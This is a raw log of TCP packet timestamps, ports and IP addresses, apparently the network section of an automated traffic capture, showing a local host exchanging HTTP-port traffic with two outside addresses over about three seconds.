Apr 27, 2024 02:19:18.931955099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:18.932038069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:18.955367088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.955457926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.955528975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.957580090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.957632065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.957640886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.957691908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.957735062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.957752943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.957830906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:18.957871914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:18.958101988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.003331900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.003397942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.003495932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.003501892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.054578066 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.054667950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.054682970 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.054727077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.054740906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.054780006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.103456974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.103471041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.103566885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.151774883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.151793957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.151870012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.153666973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.153737068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.153785944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.153810978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.153845072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.153929949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.153973103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.153979063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.154017925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.175369024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.175441980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.202114105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.202131033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.202173948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.202210903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.226527929 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.226542950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.226646900 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.273664951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.273703098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.273802042 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.347660065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.347675085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.347686052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.347698927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.347798109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.347806931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.347841978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.349673986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.349728107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.349797964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.349863052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.349962950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.349973917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.350043058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.352324009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.398488045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.398502111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.398621082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.445377111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.445483923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.445585012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.519779921 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.519798040 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.519872904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.519913912 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.543288946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.543302059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.543386936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.545092106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.545106888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.545150042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.545171976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.546905041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.546917915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.547003984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.547034979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.547079086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.568978071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.568990946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.569086075 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.617049932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.617095947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.617189884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.692763090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.692780018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.692821980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.692863941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.739382029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.739485025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.739531994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.740834951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.740895033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.740956068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.740974903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.741034985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.741046906 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.741097927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.741131067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.741177082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.742347002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.742418051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.742460966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.742500067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.742585897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.742626905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.742672920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.790013075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.790088892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.790153027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.790205956 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.793319941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.865628958 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.865720034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.911726952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.911744118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.911825895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.911854982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.911931038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.911932945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.911998987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.936309099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.936407089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.937299013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.937316895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.937374115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.937392950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.939980030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.940037966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.940062046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.940121889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.940140963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.940181971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.940196037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.940228939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.961568117 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:19.961647987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:19.989645004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.989712954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:19.989840031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:19.989901066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.036657095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.036755085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.036763906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.036843061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.084645033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.084748983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.084753036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.084779978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.084820032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.084872961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.132852077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.132930040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.133948088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.133997917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.134141922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.134246111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.134382963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.134471893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.134475946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.134527922 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.136975050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.137022972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.137075901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.185138941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.185223103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.185281038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.210038900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.210167885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.210170031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.210225105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.255920887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.256084919 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.256089926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.256134987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.256215096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.256262064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.304934025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.305011034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.307056904 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.307135105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.328561068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.330672979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.330729008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.331001043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.332928896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.332973003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.333005905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.333137989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.333178997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.382113934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.382209063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.382322073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.382385969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.428373098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.428456068 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.477617025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.477701902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.525278091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.525372028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.525413036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.525455952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.527514935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.527529001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.527544022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.527550936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.527579069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.527604103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.527643919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.527658939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.527678013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.527703047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.553185940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.553235054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.553248882 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.553303003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.577384949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.577461004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.599673033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.599751949 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.649821997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.649912119 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.720033884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.720086098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.720139980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.720196009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.722073078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.722143888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.722182989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.722258091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.725121021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.725153923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.725171089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.725199938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.762048960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.772042990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.772095919 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.773545027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.822295904 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.822393894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.824551105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.897663116 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.897753000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.897757053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.897793055 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.897825956 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.897864103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.915549994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.915704966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.915766954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.917339087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.917388916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.917433023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.917566061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.943480968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.943537951 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:20.957015038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:20.957123041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:20.993618965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:20.993681908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.020205975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.069606066 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.069654942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.069669008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.069677114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.069717884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.069717884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.074541092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.110892057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.110982895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.111042023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.112411976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.112515926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.112611055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.115701914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.115753889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.152331114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.152347088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.152497053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.165066957 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.165127993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.241591930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.241662025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.241688013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.241703033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.241733074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.241775036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.271091938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.288038969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.288116932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.307054996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.307131052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.307199001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.308655977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.308722019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.308777094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.337212086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.337268114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.348211050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.348274946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.348404884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.348418951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.348459005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.412600994 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.412667990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.412679911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.412722111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.412729979 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.412763119 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.458863020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.458931923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.459182024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.459232092 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.503057957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.503170013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.503216982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.507960081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.507973909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.508028984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:21.509823084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:21.509885073 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:21.544816017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:21.544852018 CEST	80	49734	176.97.76.106	192.168.2.4
